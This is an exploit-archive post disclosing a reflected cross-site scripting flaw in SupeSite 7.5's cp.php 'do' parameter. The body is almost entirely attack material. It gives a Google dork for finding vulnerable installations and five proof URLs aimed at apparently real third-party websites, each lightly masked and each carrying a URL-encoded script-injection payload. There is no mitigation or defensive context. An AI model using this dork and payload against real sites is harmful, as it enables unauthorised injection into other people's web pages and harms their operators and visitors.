Home / exploits SupeSite 7.5 Cross site scripting vulnerability
Posted on 21 August 2013
<pre>#**************************************************************************** # Exploit Title : SupeSite 7.5 Cross site scripting vulnerability # Exploit Author : Ashiyane Digital Security Team # Date: 2013/08/21 # Vendor Page: http://www.supesite.com/ # Version: 7.5 # AVN : ASH-2013-144 #**************************************************************************** # Tested on: Windows,Linux #**************************************************************************** # #/////////////////////////////////////////////// # Google Dork : intext:"Powered by SupeSite 7.5" #/////////////////////////////////////////////// # Location : /site/cp.php?&ac=news&do=[xss] # # Proof: # # http://wwwX.com/site/cp.php?&ac=news&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://lib.ouX.cn/site/cp.php?&ac=news&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://www.opXwrt.org.cn/site/cp.php?ac=news&op=list&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://17pXku.com/site/cp.php?ac=news&op=list&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://www.chaXsha0731.cn/site/cp.php?&ac=news&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # ############################################################################## discovered by : ACC3SS ############################################################################## </pre>
